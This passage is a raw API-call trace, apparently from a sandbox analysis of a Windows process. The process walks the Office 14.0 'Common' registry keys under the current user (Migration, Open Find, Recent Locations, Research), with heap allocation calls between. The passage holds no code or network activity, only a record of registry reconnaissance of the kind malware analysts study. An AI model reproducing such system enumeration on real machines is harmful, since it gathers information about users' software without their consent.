lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.872] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.872] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.872] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.872] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.872] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Excel") returned 0x0 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.872] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Excel", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.872] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.872] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.952] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.952] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.952] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.953] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="Office") returned 0x0 [0134.953] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.953] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Office", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.953] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.953] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.953] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.953] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.953] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.953] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.953] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.953] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x3, lpName=0x9128c00, cchName=0x400 | out: lpName="Outlook") returned 0x0 [0134.953] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.953] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Outlook", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.953] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.953] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.953] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.953] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.953] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.953] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.953] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.953] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x4, lpName=0x9128c00, cchName=0x400 | out: lpName="PowerPoint") returned 0x0 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.954] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\PowerPoint", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.954] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.954] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.954] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.954] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.954] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.954] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x5, lpName=0x9128c00, cchName=0x400 | out: lpName="Project") returned 0x0 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.954] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Project", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.954] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.954] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.954] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.954] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.954] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.954] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x6, lpName=0x9128c00, cchName=0x400 | out: lpName="Publisher") returned 0x0 [0134.954] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.954] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Publisher", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.955] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.955] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.955] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.955] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.955] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.955] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.955] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.955] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x7, lpName=0x9128c00, cchName=0x400 | out: lpName="Visio") returned 0x0 [0134.955] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.955] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Visio", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.955] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.955] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.955] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.955] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.955] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.955] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.955] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.955] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x8, lpName=0x9128c00, cchName=0x400 | out: lpName="Word") returned 0x0 [0134.955] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.955] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Word", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.956] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.956] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.956] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.956] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.956] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.956] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x9, lpName=0x9128c00, cchName=0x400 | out: lpName="Word") returned 0x103 [0134.956] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.956] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.956] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.956] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xb, lpName=0x91287f8, cchName=0x400 | out: lpName="Open Find") returned 0x0 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.956] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Open Find", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.956] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.956] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Microsoft Office Access") returned 0x0 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.956] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.956] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Open Find\\Microsoft Office Access", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.957] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.957] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.957] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.957] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.957] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="Settings") returned 0x0 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0134.957] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Open Find\\Microsoft Office Access\\Settings", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.957] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0134.957] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.957] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="New") returned 0x0 [0134.957] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0134.957] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Open Find\\Microsoft Office Access\\Settings\\New", phkResult=0x36f17c | out: phkResult=0x36f17c*=0x5c0) returned 0x0 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129818 [0134.958] RegEnumKeyA (in: hKey=0x5c0, dwIndex=0x0, lpName=0x9129818, cchName=0x400 | out: lpName="View") returned 0x0 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0134.958] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Open Find\\Microsoft Office Access\\Settings\\New\\View", phkResult=0x36f0ec | out: phkResult=0x36f0ec*=0x5c4) returned 0x0 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129c20 [0134.958] RegEnumKeyA (in: hKey=0x5c4, dwIndex=0x0, lpName=0x9129c20, cchName=0x400 | out: lpName="1033") returned 0x0 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0134.958] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Open Find\\Microsoft Office Access\\Settings\\New\\View\\1033", phkResult=0x36f05c | out: phkResult=0x36f05c*=0x5c8) returned 0x0 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd750 [0134.958] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x912a028 [0134.958] RegEnumKeyA (in: hKey=0x5c8, dwIndex=0x0, lpName=0x912a028, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x912a028 | out: hHeap=0x3f0000) returned 1 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd750 | out: hHeap=0x3f0000) returned 1 [0134.958] RegCloseKey (hKey=0x5c8) returned 0x0 [0134.958] RegEnumKeyA (in: hKey=0x5c4, dwIndex=0x1, lpName=0x9129c20, cchName=0x400 | out: lpName="1033") returned 0x103 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129c20 | out: hHeap=0x3f0000) returned 1 [0134.958] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0134.958] RegCloseKey (hKey=0x5c4) returned 0x0 [0134.958] RegEnumKeyA (in: hKey=0x5c0, dwIndex=0x1, lpName=0x9129818, cchName=0x400 | out: lpName="View") returned 0x103 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129818 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0134.959] RegCloseKey (hKey=0x5c0) returned 0x0 [0134.959] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x1, lpName=0x9129410, cchName=0x400 | out: lpName="New") returned 0x103 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0134.959] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.959] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="Settings") returned 0x103 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.959] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.959] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="Microsoft Office Access") returned 0x103 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.959] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.959] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xc, lpName=0x91287f8, cchName=0x400 | out: lpName="Recent Locations") returned 0x0 [0134.959] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.959] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.959] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.959] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Recent Locations", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.959] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.959] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.959] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.960] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="SharePoint") returned 0x0 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.960] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Recent Locations\\SharePoint", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.960] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.960] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.960] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="SharePoint") returned 0x103 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.960] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.960] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xd, lpName=0x91287f8, cchName=0x400 | out: lpName="Research") returned 0x0 [0134.960] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.960] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Research", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.960] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.961] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Options") returned 0x0 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.961] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Research\\Options", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.961] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.961] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.961] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="Favorite") returned 0x0 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.961] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Research\\Options\\Favorite", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.961] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.961] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.961] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.962] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.962] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.975] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.975] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="Favorite") returned 0x103 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.976] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, 